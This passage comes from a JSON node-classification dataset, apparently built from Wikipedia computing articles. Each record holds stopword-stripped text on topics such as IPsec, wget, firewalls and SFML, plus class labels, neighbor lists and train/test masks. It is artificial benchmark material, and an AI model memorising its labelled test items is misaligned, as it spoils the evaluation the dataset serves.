dominance home computers personal computers 1980s 2007 centralized computing coming back fashion – certain extent thin clients used many years businesses reduce total cost ownership web applications becoming popular potentially used many types computing device without need software installation already however signs pendulum swinging back away pure centralization thin client devices become like diskless workstations due increased computing power web applications start processing client side technologies ajax rich clients addition mainframes still used mission-critical applications payroll processing day-to-day account transactions banks mainframes typically accessed either using terminal emulators real terminal devices used much via modern front-ends web applications – case automated access protocols web services protocols organisations use hybrid client model partway centralized computing conventional desktop computing applications web browsers run locally applications critical business systems run terminal server one way implement simply running remote desktop software standard desktop computer relatively new method centralized computing hosted computing solves many problems associated traditional distributed computing systems centralizing processing storage powerful server hardware located data center rather local office relieves organizations many responsibilities owning maintaining information technology system services typically delivered subscription basis application service provider asp",
    "neighbors": [
      2432,
      11075,
      10020,
      2151,
      4423,
      5452,
      2222,
      10926,
      467,
      7188,
      9438,
      1406
    ],
    "mask": "Test"
  },
  {
    "node_id": 3730,
    "label": 4,
    "text": "Permanent_Record_(book):permanent record book permanent record book edward snowden planned published september 17 2019",
    "neighbors": [
      1930,
      3495
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3731,
    "label": 2,
    "text": "John_Gilmore_(activist):john gilmore activist john gilmore born 1955 one founders electronic frontier foundation cypherpunks mailing list cygnus solutions created alt hierarchy usenet major contributor gnu project outspoken civil libertarian gilmore sued federal aviation administration department justice others plaintiff prominent case gilmore v. gonzales challenging secret travel-restriction laws also advocate drug policy reform co-authored bootstrap protocol 1985 evolved dhcp—the primary way local networks assign devices ip address fifth employee sun microsystems founder cygnus support became wealthy enough retire early pursue interests frequent contributor free software worked several gnu projects including maintaining gnu debugger early 1990s initiating gnu radio 1998 starting gnash media player december 2005 create free software player flash movies writing pdtar program became gnu tar outside gnu project founded frees/wan project implementation ipsec promote encryption internet traffic sponsored eff deep crack des cracker micropolis city building game based simcity proponent opportunistic encryption gilmore co-authored bootstrap protocol rfc 951 bill croft 1985 bootstrap protocol evolved dhcp method ethernet wireless networks typically assign devices ip address gilmore owns domain name toad.com one 100 oldest active .com domains registered august 18 1987 runs mail server toad.com open mail relay october 2002 gilmore isp verio cut internet access running open relay violation verio terms service many people contend open relays make easy send spam gilmore protests mail server programmed essentially useless spammers senders mass email argues verio actions constitute censorship also notes configuration makes easier friends travel send email although critics counter mechanisms accommodate people wanting send email traveling measures gilmore took make server useless spammers may may helped considering 2002 least one mass-mailing worm sent open relays—w32.yaha—had hardcoded relay toad.com mailserver gilmore famously stated internet censorship net interprets censorship damage routes around unsuccessfully challenged constitutionality secret laws regarding travel security policies gilmore v. gonzales gilmore also advocate relaxing drug laws given financial support students sensible drug policy marijuana policy project erowid maps flex rights various organizations seeking end war drugs member boards maps marijuana policy project electronic frontier foundation following sale amprnet address space mid-2019 gilmore—under amateur radio call sign codice_1—was listed board member amateur radio digital communications inc. non-profit involved management resources behalf amateur radio community gilmore received free software foundation advancement free software 2009 award",
    "neighbors": [
      8224,
      3297,
      9665,
      6599,
      9579,
      7376,
      8373,
      3350,
      3742
    ],
    "mask": "None"
  },
  {
    "node_id": 3732,
    "label": 4,
    "text": "Next-generation_firewall:next-generation firewall next-generation firewall ngfw part third generation firewall technology combining traditional firewall network device filtering functionalities application firewall using in-line deep packet inspection dpi intrusion prevention system ips techniques might also employed tls/ssl encrypted traffic inspection website filtering qos/bandwidth management antivirus inspection third-party identity management integration i.e ldap radius active directory ngfws include typical functions traditional firewalls packet filtering network- port-address translation nat stateful inspection virtual private network vpn support goal next-generation firewalls include layers osi model improving filtering network traffic dependent packet contents ngfws perform deeper inspection compared stateful inspection performed first- second-generation firewalls ngfws use thorough inspection style checking packet payloads matching signatures harmful activities exploitable attacks malware improved detection encrypted applications intrusion prevention service modern threats like web-based malware attacks targeted attacks application-layer attacks significantly negative effect threat landscape fact 80 new malware intrusion attempts exploiting weaknesses applications opposed weaknesses networking components services stateful firewalls simple packet filtering capabilities efficient blocking unwanted applications applications met port-protocol expectations administrators could promptly prevent unsafe application accessed users blocking associated ports protocols today blocking web application like farmville uses port 80 closing port would also mean complications entire http protocol protection based ports protocols ip addresses reliable viable led development identity-based security approach takes organizations step ahead conventional security appliances bind security ip-addresses ngfws offer administrators deeper awareness control individual applications along deeper inspection capabilities firewall administrators create granular allow/deny rules controlling use websites applications network",
    "neighbors": [
      8343,
      929,
      2213,
      8998,
      1961,
      939,
      3500,
      3885,
      10417,
      6834,
      569,
      5178,
      11577,
      3521,
      2118,
      10058,
      10574,
      4435,
      8022,
      8668,
      94,
      9713,
      5749,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 3733,
    "label": 9,
    "text": "Function_composition_(computer_science):function composition computer science computer science function composition act mechanism combine simple functions build complicated ones like usual composition functions mathematics result function passed argument next result last one result whole programmers frequently apply functions results functions almost programming languages allow cases composition functions interesting function right used later function always defined languages first-class functions make easier ability easily compose functions encourages factoring breaking apart functions maintainability code reuse generally big systems might built composing whole programs narrowly speaking function composition applies functions operate finite amount data step sequentially processing handing next functions operate potentially infinite data stream codata known filters instead connected pipeline analogous function composition execute concurrently example suppose two functions formula_1 formula_2 formula_3 formula_4 composing means first compute formula_4 use formula_6 compute formula_3 example c language steps combined n't give name intermediate result despite differences length two implementations compute result second implementation requires one line code colloquially referred highly composed form readability hence maintainability one advantage highly composed forms since require fewer lines code minimizing program surface area demarco lister empirically verify inverse relationship surface area maintainability hand may possible overuse highly composed forms nesting many functions may opposite effect making code less maintainable stack-based language functional composition even natural performed concatenation usually primary method program design example forth take whatever stack apply g f leave result stack see postfix composition notation corresponding mathematical notation suppose combination calling f result g frequently useful want name foo used function right languages define new function implemented composition example c long form intermediates would work well example forth languages c way create new function define program source means functions ca n't composed run time functional programming languages function composition naturally expressed higher-order function operator programming languages write mechanisms perform function composition haskell example given becomes using built-in composition operator read f g g composed f composition operator defined haskell using lambda expression first lines describes type takes pair functions returns function note haskell n't require specification exact input output types f g relations f must accept g returns makes polymorphic operator variants lisp especially scheme interchangeability code data together treatment functions lend extremely well recursive definition variadic compositional operator many dialects apl feature built function composition using symbol codice_1 higher-order function extends function composition dyadic application left side function codice_2 codice_3 additionally define function composition dialect support inline definition using braces traditional definition available perl 6 like haskell built function composition operator main difference spelled codice_1 codice_5 also like haskell could define operator fact following perl 6 code used define rakudo implementation python way define composition group functions using reduce function use functools.reduce python 3 javascript define function takes two functions f g produces function c define func takes two funcs f g produces func languages like ruby let construct binary operator however native function composition operator introduced ruby 2.6 notions composition including principle compositionality composability ubiquitous numerous strands research separately evolved following sampling kind research notion composition central whole programs systems treated functions readily composed inputs outputs well-defined pipelines allowing easy composition filters successful became design pattern operating systems imperative procedures side effects violate referential transparency therefore cleanly composable however consider state world running code input output get clean function composition functions corresponds running procedures one monads formalism uses idea incorporate side effects i/o functional languages",
    "neighbors": [
      3462,
      7175,
      9224,
      9225,
      8587,
      3990,
      5783,
      5917,
      9245,
      3876,
      5677,
      2045,
      8499,
      11574,
      3904,
      7872,
      1613,
      333,
      9295,
      337,
      2519,
      11610,
      2011,
      1889,
      1890,
      3809,
      10083,
      6502,
      8554,
      5357,
      2670,
      10617,
      2557
    ],
    "mask": "Test"
  },
  {
    "node_id": 3734,
    "label": 2,
    "text": "Simple_and_Fast_Multimedia_Library:simple fast multimedia library simple fast multimedia library sfml cross-platform software development library designed provide simple application programming interface api various multimedia components computers written c++ bindings available c crystal euphoria go java julia .net nim ocaml python ruby rust experimental mobile ports made available android ios release sfml 2.2 sfml handles creating input windows creating managing opengl contexts also provides graphics module simple hardware acceleration 2d computer graphics includes text rendering using freetype audio module uses openal networking module basic transmission control protocol tcp user datagram protocol udp communication sfml free open-source software provided terms zlib/png license available linux macos windows freebsd. ref name= sfml/cmake/config.cmake /ref first version v1.0 released 9 august 2007 latest version v2.5.1 released 15 oct 2018 sfml consists various modules graphics module one main features sfml developers interested creating environment program directly opengl using window module without graphics module similarly modules also used independently except system module used modules sfml written c++ provides c++ interface several language bindings exist enable using sfml programming languages table lists supported bindings sfml sfml provides basic functions higher-level software built add-on libraries exist provide added support graphical user interfaces guis 2d lighting particle systems animation video playback tilemaps sfml primarily used hobbyist game developers small independent video game developers startup companies consisting several developers sfml require writing large amounts code adopted many ludum dare participants also compared older libraries simple directmedia layer sdl allegro sfml user base relatively small growing github software repository starred 4255 users. ref name= sfml/sfml 2018-05-10 /ref sfml used teaching universities scientific projects. ref name= engaging computing group comp4spr14 ps5b /ref examples games using sfml listed indiedb",
    "neighbors": [
      1666,
      2186,
      6797,
      9491,
      11413,
      1435,
      9245,
      10654,
      5663,
      10016,
      3491,
      3876,
      6180,
      9128,
      8618,
      2603,
      10924,
      5165,
      5677,
      7983,
      823,
      6718,
      2368,
      1347,
      1348,
      7364,
      4550,
      8771,
      8524,
      7629,
      2769,
      7889,
      11221,
      4182,
      4822,
      10841,
      11487,
      8554,
      9579,
      5612,
      4589,
      5743,
      8303,
      8304,
      10480,
      10739,
      2804,
      3573,
      8438,
      9848,
      5754,
      2045,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 3735,
    "label": 2,
    "text": "Network_Installation_Manager:network installation manager network installation manager nim object-oriented system management framework ibm aix operating system installs manages systems network nim analogous kickstart linux world nim client-server system nim server provides boot image client systems via bootp tftp protocols addition boot images nim manage software updates third-party applications suma command integrated nim automate system updates central server subsequent distribution clients nim data organized object classes object types classes include machines networks resources types refer kind object within class e.g. script image resources",
    "neighbors": [
      6993,
      3323,
      4309,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 3736,
    "label": 9,
    "text": "Comparison_of_Visual_Basic_and_Visual_Basic_.NET:comparison visual basic visual basic .net visual basic .net released microsoft 2002 successor original visual basic computer programming language implemented .net framework 1.0 main new feature managed code programmers familiar visual basic would probably encountered difficulties working new version adapting existing programs new platform bore little resemblance predecessor programmers expected able recompile visual basic source .net target reality situation visual basic .net vastly different paradigm obvious syntax differences aside visual basic .net provides much functionality c since compile msil obvious difference case insensitivity visual basic .net maintaining original case-insensitivity visual basic problem c programmers trying inter-operate visual basic .net developers anything else basic syntax remains similar conditions loops procedures sub-routines declared written manner see visual basic mobility prior visual basic iterations visual basic .net really parts existing code programmers experience worlds required effectively target new platform older logic visual basic .net developer learn use basic .net types rather used visual basic programmer worked visual basic may encounter steep learning curve migrate visual basic .net programmer versed another language exposure .net runtime able cope would better think visual basic .net new language inspired classic visual basic rather continuation visual basic 6.0 added difficulty migrating programmers vb.net interfaces .net framework whereas vb6 based component object model com immediate changes developers take note visual basic .net allows codice_1 codice_2 codice_3 codice_4 codice_5 codice_6 codice_7 compound operators longer lines like variable variable 1 written variable += 1 however increment decrement operators supported prior iterations visual basic statements condition would evaluated even outcome condition could determined evaluating condition example foo bar end inefficient could lead unexpected results person used another language visual basic .net new andalso orelse operators added provide short-circuit evaluation like many languages var* variable types deprecated visual basic .net common runtime decides types reference types types value types longer domain programmer class properties longer require let set statements debugprint replaced debugwrite debugwriteline procedure call must parentheses visual basic .net visual basic .net requires byval byref specification parameters visual basic specification could omitted implying byref default development environments visual studio .net automatically insert byval effect default byval byref tools convert visual basic code vb.net visual basic upgrade wizard included visual studio .net 2002 2003 conversion tools automatically insert byref necessary preserving semantics visual basic application visual basic 5.0 6.0 traditionally employed zero-based arrays default lower bound unless option base 1 declared source many out-by-one errors visual basic programs especially dealing interoperability across program library boundaries although .net common language runtime support arrays base value visual basic .net c provide zero-based arrays lists .net common language specification requires zero-based arrays interoperability .net languages visual basic .net introduced concept jagged array whereby rows unequal length opposed uniform length arrays imposed visual basic programmers languages compiling .net platform types strict whilst runtime allows anonymous object n't pre-defined named type type variable may change course life-time hence need drop variant data-type however type object somewhat similar behavior practice visual basic object-based language supported classes concepts would make object-oriented language visual basic .net true object-oriented language following features although language targeting .net allows multiple inheritance classes—multiple inheritance interfaces supported whilst ide reasonable job hiding fact dependence activex objects dropped visual basic .net although mechanisms interfacing com .net favour .net components offering similar functionality shift good visual basic developer since much performance issues visual basic arose around cost com interface one true banes visual basic developer life always writing resize code whilst winforms paradigm leaves lot desired geometry management department face toolkits like qt gtk+ least developer anchor widgets forms instead write reams code onresize handlers visual basic .net option explicit default",
    "neighbors": [
      7691,
      6160,
      22,
      4136,
      11315,
      5684,
      4160,
      4674,
      8262,
      1610,
      1611,
      9804,
      92,
      5733,
      7274,
      5747,
      3705,
      6778,
      11412,
      9881,
      155,
      3233,
      5796,
      5806,
      7343,
      3765,
      7355,
      7870,
      712,
      8397,
      7894,
      8429,
      6910,
      6411,
      1805,
      6414,
      9997,
      10510,
      786,
      797,
      5925,
      11559,
      8494,
      303,
      9008,
      7479,
      315,
      10043,
      7486,
      5952,
      5961,
      847,
      10586,
      11617,
      2915,
      10624,
      1931,
      5521,
      3481,
      11683,
      8101,
      10666,
      10684,
      963,
      11212,
      11219,
      5588,
      4057,
      11229,
      9188,
      4069,
      11243,
      2541,
      6640,
      3573,
      1016,
      3577,
      10750,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 3737,
    "label": 9,
    "text": "Mike_Woodger:mike woodger michael mike woodger born 28 march 1923 pioneering english computer scientist influential development early pilot ace computer working alan turing later design documentation programming languages algol 60 ada based national physical laboratory npl located teddington london career mike woodger eldest four children father joseph henry woodger 1894–1981 professor biology university london graduated university college london 1943 worked ministry supply military applications rest second world war may 1946 joined new mathematics division national physical laboratory located west london npl worked alan turing ace computer design leading eventually pilot ace computer turing left npl first operational 1950 later worked programming language design especially algol 60 ada",
    "neighbors": [
      512,
      1610,
      1611,
      428,
      5456
    ],
    "mask": "Test"
  },
  {
    "node_id": 3738,
    "label": 2,
    "text": "Boot_flag:boot flag boot flag 1-byte value non-extended partition record within master boot record appears beginning partition record value 0x80 value 0x00 indicates partition boot flag set value invalid primary function indicate ms-dos/ms windows-type boot loader partition boot cases used windows xp/2000 assign active partition letter c active partition partition boot flag set dos windows allow one boot partition set boot flag boot loaders used third-party boot managers grub xosl installed master boot record boot primary extended partitions boot flag set many disk editors modify boot flag disk management windows fdisk buggy bioses test bootflag least one partition set otherwise ignore device boot-order even bootloader need flag set start bootcode bios",
    "neighbors": [
      2545,
      6797,
      9166
    ],
    "mask": "None"
  },
  {
    "node_id": 3739,
    "label": 4,
    "text": "HitmanPro:hitmanpro hitmanpro formerly hitman pro portable antimalware program aims detect found remove malicious files registry entries related rootkits trojans viruses worms spyware adware rogue antivirus programs ransomware malware infected computers suspicious objects analyzed across internet connection using range online malware detection services see multiscanning removed hitmanpro confirmed latest version 3.7.9 uses bitdefender kaspersky lab in-cloud technology partners low system load virus definitions installed tested depth computer question rather analyzed remotely company behind hitmanpro surfright acquired sophos december 2015 version 3 hitmanpro three different types antimalware scans default scan quick scan early score warning default scan check entire computer send suspicious files cloud quick scan scan common parts infections send unknown files cloud early score warning scan entire computer examine every file advanced heuristics check common symptoms malware including recently installed computer starts automatically windows boots impersonating common system file even tray icon taskbar hitmanpro 3 completely different design earlier versions hitman pro developed mark loman netherlands previous versions version 1 2 automatically download install run third party anti-spyware anti-adware programs freely available internet",
    "neighbors": [
      7809,
      10756,
      7948,
      6679,
      10392,
      2721,
      2213,
      7983,
      11313,
      1970,
      10166,
      7739,
      4165,
      4421,
      2257,
      7515,
      9055,
      877,
      2041
    ],
    "mask": "Train"
  },
  {
    "node_id": 3740,
    "label": 2,
    "text": "SocketCAN:socketcan socketcan set open source drivers networking stack contributed volkswagen research linux kernel formerly known low level framework llcf traditional drivers linux based model character devices typically allow sending receiving controller conventional implementations class device driver allow single process access device means processes blocked meantime addition drivers typically differ slightly interface presented application stifling portability socketcan concept hand uses model network devices allows multiple applications access one device simultaneously also single application able access multiple networks parallel socketcan concept extends berkeley sockets api linux introducing new protocol family pf_can coexists protocol families like pf_inet internet protocol communication bus therefore done analogously use internet protocol via sockets fundamental components socketcan network device drivers different controllers implementation protocol family protocol family pf_can provides structures enable different protocols bus raw sockets direct communication transport protocols point-to-point connections moreover broadcast manager part protocol family provides functions e.g sending messages periodically realize complex message filters patches added 2.6.25 linux kernel meanwhile controller drivers added work going add drivers variety controllers application first sets access interface initialising socket much like tcp/ip communications binding socket interface interfaces application desires bound socket used like udp socket via codice_1 codice_2 etc ... python added support socketcan version 3.3 open source library python-can provides socketcan support python 2 python 3 installing device requires loading can_dev module configuring ip link specify bus bitrate example also virtual driver testing purposes loaded created linux commands following code snippet working example socketcan api sends packet using raw interface based notes documented linux kernel packet analyzed vcan0 interface using candump utility part socketcan can-utils package",
    "neighbors": [
      5472,
      5785,
      8554,
      11413
    ],
    "mask": "Test"
  },
  {
    "node_id": 3741,
    "label": 4,
    "text": "Child_Exploitation_Tracking_System:child exploitation tracking system child exploitation tracking system cets microsoft software based solution assists managing linking worldwide cases related child protection cets developed collaboration law enforcement canada administered loose partnership microsoft law enforcement agencies cets offers tools gather share evidence information identify prevent punish commit crimes children 2003 detective sergeant paul gillespie officer charge child exploitation section toronto police service sex crimes unit made request directly bill gates ceo chief architect microsoft time assistance types crimes agencies experienced tracking apprehending perpetrate crimes involved design implementation policy solution needed assist law enforcement agencies initial point detection investigative phase arrest prosecution conviction criminal addition imperative solution adhered existing rights civil liberties citizens various countries included remaining independent internet traffic individual user ’ computer finally solution needed global nature enable collaboration among nations agencies order increase effectiveness investigators worldwide system would allow law enforcement entities number law enforcement agencies use deploying cets tool include child exploitation crimes increasing problem technology advances tracking system proven success rate bringing many violate law justice microsoft contributed technology creating ncmec furthered development system captures criminals addition removing offensive images microsoft implemented photodna online properties including bing skydrive hotmail already resulted identification reporting removal thousands images child pornography microsoft,2013 .microsoft child exploitation crimes microsoft n.p. 2013 web microsoft large contributor toward efforts online surveillance broken walls online anonymity",
    "neighbors": [
      7084
    ],
    "mask": "None"
  },
  {
    "node_id": 3742,
    "label": 5,
    "text": "IPsec:ipsec computing internet protocol security ipsec secure network protocol suite authenticates encrypts packets data sent internet protocol network used virtual private networks vpns ipsec includes protocols establishing mutual authentication agents beginning session negotiation cryptographic keys use session ipsec protect data flows pair hosts host-to-host pair security gateways network-to-network security gateway host network-to-host internet protocol security ipsec uses cryptographic security services protect communications internet protocol ip networks ipsec supports network-level peer authentication data-origin authentication data integrity data confidentiality encryption replay protection initial ipv4 suite developed security provisions part ipv4 enhancement ipsec layer 3 osi model internet layer end-to-end security scheme internet security systems widespread use operate layer 3 transport layer security tls secure shell ssh operate application layer ipsec automatically secure applications ip layer starting early 1970s advanced research projects agency sponsored series experimental arpanet encryption devices first native arpanet packet encryption subsequently tcp/ip packet encryption certified fielded 1986 1991 nsa sponsored development security protocols internet secure data network systems sdns program brought together various vendors including motorola produced network encryption device 1988 work openly published 1988 nist security protocol layer 3 sp3 would eventually morph iso standard network layer security protocol nlsp 1992 1995 various research groups improved upon sdns sp3 1992 us naval research laboratory nrl began sipp project research implement ip encryption december 1993 experimental software ip encryption protocol swipe developed sunos columbia university bell labs john ioannidis others funded white house 1993 wei xu trusted information systems tis followed swipe research enhanced ip security protocols developed device driver data encryption standard december 1994 team released tis gauntlet firewall product integrated 3des hardware encryption provided commercial ip security t1 speeds securing networks us east west coasts period internet engineering task force ietf ip security working group formed standardize efforts open freely available set security extensions called ipsec 1995 working group published rfc-1825 rfc-1827 nrl first working implementation ipsec open standard part ipv4 suite ipsec uses following protocols perform various functions security authentication header ah derived partially previous ietf standards work authentication simple network management protocol snmp version 2 authentication header ah member ipsec protocol suite ah ensures connectionless integrity using hash function secret shared key ah algorithm ah also guarantees data origin authenticating ip packets optionally sequence number protect ipsec packet contents replay attacks using sliding window technique discarding old packets ah operates directly top ip using ip protocol number 51 following ah packet diagram shows ah packet constructed interpreted ip encapsulating security payload esp researched naval research laboratory starting 1992 part darpa-sponsored research project openly published ietf sipp working group drafted december 1993 security extension sipp esp originally derived us department defense sp3d protocol rather derived iso network-layer security protocol nlsp sp3d protocol specification published nist late 1980s designed secure data network system project us department defense encapsulating security payload esp member ipsec protocol suite provides origin authenticity source authentication data integrity hash functions confidentiality encryption protection ip packets esp also supports encryption-only authentication-only configurations using encryption without authentication strongly discouraged insecure unlike authentication header ah esp transport mode provide integrity authentication entire ip packet however tunnel mode entire original ip packet encapsulated new packet header added esp protection afforded whole inner ip packet including inner header outer header including outer ipv4 options ipv6 extension headers remains unprotected esp operates directly top ip using ip protocol number 50 following esp packet diagram shows esp packet constructed interpreted ipsec protocols use security association communicating parties establish shared security attributes algorithms keys ipsec provides range options determined whether ah esp used exchanging data two hosts agree algorithm used encrypt ip packet example des idea hash function used ensure integrity data md5 sha parameters agreed particular session lifetime must agreed session key algorithm authentication also agreed data transfer takes place ipsec supports range methods authentication possible pre-shared key symmetric key already possession hosts hosts send hashes shared key prove possession key ipsec also supports public key encryption host public private key exchange public keys host sends nonce encrypted host public key alternatively hosts hold public key certificate certificate authority used ipsec authentication security associations ipsec established using internet security association key management protocol isakmp isakmp implemented manual configuration pre-shared secrets internet key exchange ike ikev2 kerberized internet negotiation keys kink use ipseckey dns records rfc 5386 defines better-than-nothing security btns unauthenticated mode ipsec using extended ike protocol order decide protection provided outgoing packet ipsec uses security parameter index spi index security association database sadb along destination address packet header together uniquely identifies security association packet similar procedure performed incoming packet ipsec gathers decryption verification keys security association database ip multicast security association provided group duplicated across authorized receivers group may one security association group using different spis thereby allowing multiple levels sets security within group indeed sender multiple security associations allowing authentication since receiver know someone knowing keys sent data note relevant standard describe association chosen duplicated across group assumed responsible party made choice ipsec protocols ah esp implemented host-to-host transport mode well network tunneling mode transport mode payload ip packet usually encrypted authenticated routing intact since ip header neither modified encrypted however authentication header used ip addresses modified network address translation always invalidates hash value transport application layers always secured hash modified way example translating port numbers means encapsulate ipsec messages nat traversal defined rfc documents describing nat-t mechanism tunnel mode entire ip packet encrypted authenticated encapsulated new ip packet new ip header tunnel mode used create virtual private networks network-to-network communications e.g routers link sites host-to-network communications e.g remote user access host-to-host communications e.g private chat tunnel mode supports nat traversal cryptographic algorithms defined use ipsec include refer rfc 8221 details ipsec implemented ip stack operating system requires modification source code method implementation done hosts security gateways various ipsec capable ip stacks available companies hp ibm alternative called bump-in-the-stack bits implementation operating system source code modified ipsec installed ip stack network drivers way operating systems retrofitted ipsec method implementation also used hosts gateways however retrofitting ipsec encapsulation ip packets may cause problems automatic path mtu discovery maximum transmission unit mtu size network path two ip hosts established host gateway separate cryptoprocessor common military also found commercial systems so-called bump-in-the-wire bitw implementation ipsec possible ipsec implemented kernel key management isakmp/ike negotiation carried user space openly specified pf_key key management api version 2 often used enable application-space key management application update ipsec security associations stored within kernel-space ipsec implementation existing ipsec implementations usually include esp ah ike version 2 existing ipsec implementations unix-like operating systems example solaris linux usually include pf_key version 2 embedded ipsec used ensure secure communication among applications running constrained resource systems small overhead ipsec developed conjunction ipv6 originally required supported standards-compliant implementations ipv6 rfc 6434 made recommendation ipsec also optional ipv4 implementations ipsec commonly used secure ipv4 traffic ipsec protocols originally defined rfc 1825 rfc 1829 published 1995 1998 documents superseded rfc 2401 rfc 2412 incompatible engineering details although conceptually identical addition mutual authentication key exchange protocol internet key exchange ike defined create manage security associations december 2005 new standards defined rfc 4301 rfc 4309 largely superset previous editions second version internet key exchange standard ikev2 third-generation documents standardized abbreviation ipsec uppercase “ ip ” lowercase “ sec ” “ esp ” generally refers rfc 4303 recent version specification since mid-2008 ipsec maintenance extensions ipsecme working group active ietf 2013 part snowden leaks revealed us national security agency actively working insert vulnerabilities commercial encryption systems systems networks endpoint communications devices used targets part bullrun program allegations ipsec targeted encryption system openbsd ipsec stack first implementation available permissive open-source license therefore copied widely letter openbsd lead developer theo de raadt received 11 dec 2010 gregory perry alleged jason wright others working fbi inserted number backdoors side channel key leaking mechanisms openbsd crypto code forwarded email 2010 theo de raadt first express official position validity claims apart implicit endorsement forwarding email jason wright response allegations every urban legend made real inclusion real names dates times gregory perry email falls category … state clearly add backdoors openbsd operating system openbsd crypto framework ocf days later de raadt commented believe netsec probably contracted write backdoors alleged … written n't believe made tree published snowden leaks alternative explanation put forward authors logjam attack suggests nsa compromised ipsec vpns undermining diffie-hellman algorithm used key exchange paper allege nsa specially built computing cluster precompute multiplicative subgroups specific primes generators second oakley group defined rfc 2409 may 2015 90 addressable ipsec vpns supported second oakley group part ike organization precompute group could derive keys exchanged decrypt traffic without inserting software backdoors second alternative explanation put forward equation group used zero-day exploits several manufacturers vpn equipment validated kaspersky lab tied equation group validated manufacturers real exploits zero-day exploits time exposure cisco pix asa firewalls vulnerabilities used wiretapping nsa furthermore ipsec vpns using aggressive mode settings send hash psk clear apparently targeted nsa using offline dictionary attacks",
    "neighbors": [
      8192,
      513,
      514,
      7683,
      10242,
      517,
      1030,
      3592,
      9744,
      8211,
      6681,
      6682,
      10271,
      6689,
      2083,
      9251,
      2085,
      9764,
      7208,
      3629,
      7214,
      8238,
      562,
      1586,
      9269,
      7736,
      11321,
      5179,
      3133,
      4158,
      5181,
      9281,
      6723,
      11332,
      3657,
      8265,
      8266,
      4687,
      10831,
      11345,
      7252,
      2136,
      8283,
      7264,
      1634,
      10341,
      9318,
      10344,
      5225,
      107,
      3695,
      4723,
      5749,
      2679,
      2169,
      122,
      3707,
      4729,
      5241,
      6779,
      7809,
      5251,
      9860,
      1157,
      3206,
      5254,
      649,
      10889,
      651,
      9868,
      3218,
      3731,
      9365,
      5118,
      11413,
      152,
      1688,
      6808,
      10908,
      2206,
      9380,
      9381,
      8358,
      3751,
      3752,
      9383,
      172,
      2221,
      4268,
      6318,
      6319,
      10417,
      9394,
      7859,
      2228,
      9909,
      10924,
      7863,
      9399,
      4793,
      7865,
      4797,
      702,
      3777,
      10433,
      7364,
      9412,
      10436,
      8391,
      9927,
      8905,
      5322,
      5834,
      11468,
      1229,
      7887,
      3792,
      7376,
      5843,
      3286,
      732,
      3805,
      6364,
      7391,
      10461,
      3297,
      9442,
      3299,
      2797,
      751,
      8432,
      8946,
      755,
      5875,
      6904,
      3322,
      5373,
      8449,
      9987,
      774,
      3847,
      1288,
      4874,
      1297,
      10005,
      1304,
      5402,
      4891,
      5405,
      3879,
      9511,
      7983,
      7984,
      11569,
      10035,
      6456,
      5433,
      2362,
      6970,
      8504,
      829,
      318,
      5437,
      10748,
      321,
      2884,
      2373,
      2887,
      5959,
      10055,
      10058,
      849,
      4435,
      1876,
      5972,
      11606,
      2904,
      9048,
      6490,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      3941,
      871,
      3944,
      361,
      2922,
      8039,
      11112,
      367,
      6516,
      891,
      6524,
      11133,
      2431,
      11647,
      1411,
      10115,
      5516,
      6541,
      7570,
      11162,
      5531,
      1436,
      11678,
      1440,
      10144,
      10659,
      933,
      2983,
      9640,
      11693,
      6064,
      6577,
      11184,
      2996,
      8628,
      10171,
      3006,
      11198,
      449,
      2497,
      9670,
      4552,
      8649,
      3018,
      2509,
      9682,
      474,
      5084,
      8669,
      8670,
      8674,
      2531,
      7139,
      10210,
      10723,
      4071,
      10727,
      4074,
      2027,
      3564,
      5102,
      11248,
      11250,
      5107,
      1526,
      8694,
      9722,
      6651,
      3580,
      510,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 3743,
    "label": 0,
    "text": "Translatewiki.net:translatewiki.net translatewiki.net web-based translation platform powered translate extension mediawiki makes mediawiki powerful tool translating kinds text 11,000 translators 5,800,00 pages 60 projects including mediawiki openstreetmap mifos encyclopedia life mantisbt main characteristic translatewiki.net engine translate extension wiki contribution made easy web user low barrier entry quality pursued letting translators focus 're best — translation — freeing burdens translations immediately available translator smoothly synchronised revision control system translatable wiki pages without translator intervention best case mediawiki wikimedia foundation projects new localisations sometimes called continuous translation continuous localization translation editor provides various features machine-assisted translation translatewiki.net also semantic mediawiki part semantic web translatewiki.net made available niklas laxström localisation platform languages mediawiki around june 2006 named betawiki besides translation developed characteristics integrated development environment mediawiki nukawiki 2005 focus improvement internationalisation features end 2007 siebrand mazeland joined management website moved current domain april 2008 already supported 100 languages mediawiki 200 extensions making one translated software projects ever well freecol since independent volunteer project recognised major player global success mediawiki wikimedia projects powered like wikipedia 280 languages 2009 improved google summer code project niklas laxström 2011 proofreading features introduced 2012 translation memory engine expanded wikimedia projects using translate 2013 translate platform underwent major revamp translate user experience project tux including changes navigation editor look feel translation area filters search color style natively supported formats follow added customisation",
    "neighbors": [
      1089,
      3462,
      1353,
      10507,
      5612,
      7599,
      7983,
      7164
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3744,
    "label": 8,
    "text": "Wget:wget gnu wget wget formerly geturl also written package name wget computer program retrieves content web servers part gnu project name derives world wide web get supports downloading via http https ftp features include recursive download conversion links offline viewing local html support proxies appeared 1996 coinciding boom popularity web causing wide use among unix users distribution major linux distributions written portable c wget easily installed unix-like system wget ported microsoft windows mac os x openvms hp-ux morphos amigaos since version 1.14 wget able save output web archiving standard warc format used basis graphical programs gwget gnome desktop wget descends earlier program named geturl author development commenced late 1995 name changed wget author became aware earlier amiga program named geturl written james burton arexx wget filled gap inconsistent web-downloading software available mid-1990s single program could reliably use http ftp download files existing programs either supported ftp ncftp dl written perl yet ubiquitous wget inspired features existing programs supported http ftp could built using standard development tools found every unix system time many unix users struggled behind extremely slow university dial-up internet connections leading growing need downloading agent could deal transient network failures without assistance human operator 2010 chelsea manning used wget download 250,000 u.s. diplomatic cables 500,000 army reports came known iraq war logs afghan war logs sent wikileaks wget designed robustness slow unstable network connections download complete due network problem wget automatically try continue download left repeat whole file retrieved one first clients make use then-new codice_1 http header support feature wget optionally work like web crawler extracting resources linked html pages downloading sequence repeating process recursively pages downloaded maximum recursion depth specified user reached downloaded pages saved directory structure resembling remote server recursive download enables partial complete mirroring web sites via http links downloaded html pages adjusted point locally downloaded material offline viewing performing kind automatic mirroring web sites wget supports robots exclusion standard unless option codice_2 used recursive download works ftp well wget issues codice_3 command find additional files download repeating process directories files 